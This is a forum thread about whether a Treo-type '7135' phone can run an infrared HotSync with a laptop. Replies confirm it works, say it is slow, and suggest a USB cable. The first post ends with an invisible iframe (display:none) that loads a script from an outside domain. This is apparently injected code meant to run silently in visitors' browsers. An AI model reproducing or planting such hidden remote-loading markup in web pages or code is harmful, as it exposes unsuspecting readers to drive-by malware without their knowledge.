+ Reply to Thread

Infrared Hot Sync

Does anyone know whether the 7135 will be able to perform an infrared hot sync with a laptop? I tried searching the forum but couldn't find the answer. It would be great if it does as it would avoid the necessity of buying another cradle. Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Infrared Hot Sync

Originally posted by RMSko
    Does anyone know whether the 7135 will be able to perform an infrared hot sync with a laptop? I tried searching the forum but couldn't find the answer. It would be great if it does as it would avoid the necessity of buying another cradle. Thanks.
    Yes, it can. If you want the speed of USB, you could also get the "True USB data cable". It can be used both for Hotsync and to use the phone as a modem (or high speed modem on Express Network), something that you can't do with the IR. (so can the serial cable, but for Hotsync it is slower then the USB. For a modem cable it is the same).

Alan

Assimilated
    I tried this yesterday since I'm about to hit the road again for two weeks. Alan is right...IR hotsync works but it's slow and I won't have the "modem-for-my-laptop" capability. I'll have to look into that USB travel cable
    Tiger....JACK Tiger

Re: Re: Infrared Hot Sync

Originally posted by alanb
    Yes, it can. If you want the speed of USB, you could also get the "True USB data cable". It can be used both for Hotsync and to use the phone as a modem (or high speed modem on Express Network), something that you can't do with the IR. (so can the serial cable, but for Hotsync it is slower then the USB. For a modem cable it is the same).

Alan
    Is that the $14,000 USB cable on eBay?

Administrator
    naah.. totally different cable.